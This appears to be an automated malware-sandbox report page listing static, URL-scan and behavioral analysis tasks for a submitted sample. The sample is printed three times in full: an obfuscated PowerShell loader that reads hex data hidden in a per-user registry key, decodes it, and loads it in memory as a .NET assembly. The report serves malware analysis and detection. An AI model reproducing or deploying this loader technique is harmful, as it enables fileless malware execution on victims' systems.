hxxp://990351823;sleep -s 68;$yio=Get-ItemProperty -path ("hk"+"cu[:]\sof"+"tw"+"are\mic"+"ros"+"oft\Per"+"sonaliz"+"ation\"+[Environment][::]("use"+"rn"+"ame")+"0");for ($hdo=0;$hdo -le 742;$hdo++){Try{$fn+=$yio[.]$hdo}Catch{}};$hdo=0;while($true){$hdo++;$ko=[math][::]("sq"+"rt")($hdo);if($ko -eq 1000){break}}$cpd=$fn[.]replace("#",$ko);$qhn=[byte][::]("ne"+"w")($cpd[.]Length/2);for($hdo=0;$hdo -lt $cpd[.]Length;$hdo+=2){$qhn[$hdo/2]=[convert][::]("ToB"+"yte")($cpd[.]Substring($hdo,2),(2*8))}[reflection[.]assembly][::]("Lo"+"ad")($qhn);[Open][::]("Te"+"st")();509679803;

Static task

static1

URLScan task

urlscan1

Behavioral task

behavioral1

Sample

http://990351823;sleep -s 68;$yio=Get-ItemProperty -path ("hk"+"cu:\sof"+"tw"+"are\mic"+"ros"+"oft\Per"+"sonaliz"+"ation\"+[Environment]::("use"+"rn"+"ame")+"0");for ($hdo=0;$hdo -le 742;$hdo++){Try{$fn+=$yio.$hdo}Catch{}};$hdo=0;while($true){$hdo++;$ko=[math]::("sq"+"rt")($hdo);if($ko -eq 1000){break}}$cpd=$fn.replace("#",$ko);$qhn=[byte]::("ne"+"w")($cpd.Length/2);for($hdo=0;$hdo -lt $cpd.Length;$hdo+=2){$qhn[$hdo/2]=[convert]::("ToB"+"yte")($cpd.Substring($hdo,2),(2*8))}[reflection.assembly]::("Lo"+"ad")($qhn);[Open]::("Te"+"st")();509679803;

Resource

win7-20220901-en

windows7-x64

4 signatures

150 seconds

Behavioral task

behavioral2

Sample

http://990351823;sleep -s 68;$yio=Get-ItemProperty -path ("hk"+"cu:\sof"+"tw"+"are\mic"+"ros"+"oft\Per"+"sonaliz"+"ation\"+[Environment]::("use"+"rn"+"ame")+"0");for ($hdo=0;$hdo -le 742;$hdo++){Try{$fn+=$yio.$hdo}Catch{}};$hdo=0;while($true){$hdo++;$ko=[math]::("sq"+"rt")($hdo);if($ko -eq 1000){break}}$cpd=$fn.replace("#",$ko);$qhn=[byte]::("ne"+"w")($cpd.Length/2);for($hdo=0;$hdo -lt $cpd.Length;$hdo+=2){$qhn[$hdo/2]=[convert]::("ToB"+"yte")($cpd.Substring($hdo,2),(2*8))}[reflection.assembly]::("Lo"+"ad")($qhn);[Open]::("Te"+"st")();509679803;

Resource

win10v2004-20220812-en

windows10-2004-x64

5 signatures

150 seconds

Sharing

General

Malware Config

Signatures

Files